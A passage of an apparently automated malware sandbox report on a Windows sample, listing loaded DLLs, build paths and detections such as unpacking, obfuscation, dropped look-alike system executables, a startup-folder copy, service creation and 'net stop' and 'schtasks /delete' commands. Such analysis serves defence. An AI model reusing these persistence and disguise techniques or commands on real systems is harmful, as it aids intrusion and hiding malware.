Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 123.exe, 00000003.00000000.2346718297.0000000000EE3000.00000002.00000001.01000000.00000008.sdmp, 123.exe, 00000003.00000002.2356568322.0000000000EE3000.00000002.00000001.01000000.00000008.sdmp, mig.exe, 0000005D.00000002.2807847716.0000000000423000.00000002.00000001.01000000.00000019.sdmp, mig.exe, 0000005D.00000000.2686679060.0000000000423000.00000002.00000001.01000000.00000019.sdmp, mig.exe.0.dr
Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3285416095.00007FF8B9F6E000.00000002.00000001.01000000.00000013.sdmp, _bz2.pyd.14.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3284341028.00007FF8B9094000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: vcruntime140.amd64.pdbGCTL source: svchosl.exe, 0000000E.00000003.2368939718.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3286403821.00007FF8BA51E000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_ssl.pdb source: svchosl.exe, 00000010.00000002.3284663597.00007FF8B93CD000.00000002.00000001.01000000.00000017.sdmp, _ssl.pyd.14.dr
Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3285714483.00007FF8BA249000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3285071788.00007FF8B9845000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb?? source: svchosl.exe, 00000010.00000002.3283717281.00007FF8B8053000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: _.pdb source: file.exe, 00000000.00000002.3280551668.000000000485F000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.3280253389.000000000464C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079601696.0000000006DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2080087221.0000000006DC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079861670.0000000006DC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PdB] source: svchosl.exe.3.dr
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: svchosl.exe, 00000010.00000002.3280721436.00007FF8A8A03000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: svchosl.exe, 00000010.00000002.3283717281.00007FF8B8053000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: svchosl.exe, 00000010.00000002.3282402293.00007FF8A8DFD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3286731624.00007FF8BFAB3000.00000002.00000001.01000000.00000012.sdmp, select.pyd.14.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: svchosl.exe, 00000010.00000002.3280721436.00007FF8A8A03000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: svchosl.exe, 00000010.00000002.3286058819.00007FF8BA501000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3284341028.00007FF8B9094000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: svchosl.exe, 0000000E.00000003.2368939718.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3286403821.00007FF8BA51E000.00000002.00000001.01000000.0000000E.sdmp

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.file.exe.45edbe6.2.raw.unpack, EwV3ECxYhIse1SOarW.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.file.exe.7590000.7.raw.unpack, EwV3ECxYhIse1SOarW.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.file.exe.4800ee8.5.raw.unpack, EwV3ECxYhIse1SOarW.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Binary contains a suspicious time stamp
Source: 1.exe.93.dr Static PE information: 0x93306B02 [Thu Apr 2 07:04:34 2048 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
File is packed with WinRar
Source: C:\Users\123.exe File created: C:\ProgramData\MicrosoftSystem\__tmp_rar_sfx_access_check_5247265 Jump to behavior
PE file contains sections with non-standard names
Source: 123.exe.0.dr Static PE information: section name: .didat
Source: mig.exe.0.dr Static PE information: section name: .didat
Source: libcrypto-1_1.dll.14.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.14.dr Static PE information: section name: .00cfg
Source: migrate.exe.93.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C40C push cs; iretd 0_2_0041C4E2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00423149 push eax; ret 0_2_00423179
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C50E push cs; iretd 0_2_0041C4E2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004231C8 push eax; ret 0_2_00423179
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E21D push ecx; ret 0_2_0040E230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C6BE push ebx; ret 0_2_0041C6BF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029FC125 push ebx; ret 0_2_029FC126
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029FBE73 push cs; iretd 0_2_029FBF49
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029FBF75 push cs; iretd 0_2_029FBF49
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_029EE484 push ecx; ret 0_2_029EE497
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02AA678F push edi; retf 0_2_02AA6790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02AA3844 push FFFFFFE1h; ret 0_2_02AA3853
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4D709 push esi; iretd 0_2_07C4D70A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4E30B push edx; ret 0_2_07C4E314
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C4F209 push cs; ret 0_2_07C4F231
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C65E93 pushfd ; retn 07D0h 0_2_07C65FD9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07C66220 pushad ; ret 0_2_07C66221
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_084E50D3 push 0000005Eh; ret 0_2_084E5131
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_084EADC8 push eax; ret 0_2_084EADC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0851BDD1 push cs; ret 0_2_0851BE44
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_085BBCE9 push eax; ret 0_2_085BBCED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08624871 push FFFFFF8Bh; iretd 0_2_08624876
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08624959 push FFFFFF8Bh; iretd 0_2_0862495E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0862472E push FFFFFF8Bh; retf 0_2_08624731
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_086245FB push FFFFFF8Bh; retf 0_2_08624600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_086249D0 push FFFFFF8Bh; iretd 0_2_086249D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_086246D6 push FFFFFF8Bh; retf 0_2_086246D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_086248AA push FFFFFF8Bh; iretd 0_2_086248AF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_08624786 push FFFFFF8Bh; retf 0_2_08624789
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0862498D push FFFFFF8Bh; iretd 0_2_0862499B
Source: C:\Users\123.exe Code function: 3_2_00ECF640 push ecx; ret 3_2_00ECF653
Source: file.exe Static PE information: section name: .text entropy: 7.930607336213552
Source: 0.2.file.exe.45edbe6.2.raw.unpack, EwV3ECxYhIse1SOarW.cs High entropy of concatenated method names: 'BPTavEfPI8', 'uVaa4GpUIk', 'u6YaUGQ5Rc', 't0UaRBG3Pj', 'pNJaQb5F9t', 'YcBaEMIBPc', 'p_0099_009E_000D_000A8_008C9t_0095o', 'nWN5m7K3Q', 'ReZxSxiJZ', 'kJmawSxbE'
Source: 0.2.file.exe.7590000.7.raw.unpack, EwV3ECxYhIse1SOarW.cs High entropy of concatenated method names: 'BPTavEfPI8', 'uVaa4GpUIk', 'u6YaUGQ5Rc', 't0UaRBG3Pj', 'pNJaQb5F9t', 'YcBaEMIBPc', 'p_0099_009E_000D_000A8_008C9t_0095o', 'nWN5m7K3Q', 'ReZxSxiJZ', 'kJmawSxbE'
Source: 0.2.file.exe.4800ee8.5.raw.unpack, EwV3ECxYhIse1SOarW.cs High entropy of concatenated method names: 'BPTavEfPI8', 'uVaa4GpUIk', 'u6YaUGQ5Rc', 't0UaRBG3Pj', 'pNJaQb5F9t', 'YcBaEMIBPc', 'p_0099_009E_000D_000A8_008C9t_0095o', 'nWN5m7K3Q', 'ReZxSxiJZ', 'kJmawSxbE'
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\mig.exe Jump to dropped file
Source: C:\Users\mig.exe File created: C:\ProgramData\migrate.exe Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_bz2.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_ctypes.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\python38.dll Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_socket.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\VCRUNTIME140.dll Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\libssl-1_1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\1.exe Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\libcrypto-1_1.dll Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\libffi-7.dll Jump to dropped file
Source: C:\Users\mig.exe File created: C:\ProgramData\1.exe Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_ssl.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\unicodedata.pyd Jump to dropped file
Source: C:\Users\123.exe File created: C:\ProgramData\MicrosoftSystem\svchosl.exe Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\123.exe Jump to dropped file
Source: C:\Users\123.exe File created: C:\ProgramData\MicrosoftSystem\Wmiic.exe Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_hashlib.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\select.pyd Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\mig.exe File created: C:\ProgramData\migrate.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\1.exe Jump to dropped file
Source: C:\Users\mig.exe File created: C:\ProgramData\1.exe Jump to dropped file
Source: C:\Users\123.exe File created: C:\ProgramData\MicrosoftSystem\svchosl.exe Jump to dropped file
Source: C:\Users\123.exe File created: C:\ProgramData\MicrosoftSystem\Wmiic.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_bz2.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_ctypes.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\python38.dll Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_socket.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\VCRUNTIME140.dll Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\libssl-1_1.dll Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\libcrypto-1_1.dll Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\libffi-7.dll Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_ssl.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\unicodedata.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_lzma.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\_hashlib.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\Temp\_MEI65122\select.pyd Jump to dropped file

Boot Survival
barindex
Drops PE files to the startup folder
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\1.exe Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn WindowsUpdate /F
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1.exe
Creates or modifies windows services
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\NSSM Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1.exe
Uses net.exe to stop services
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" stop wmservice
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014000A2E0 _snwprintf_s,PathQuoteSpacesW,GetModuleFileNameW,GetModuleFileNameW,PathQuoteSpacesW,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError, 6_2_000000014000A2E0

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
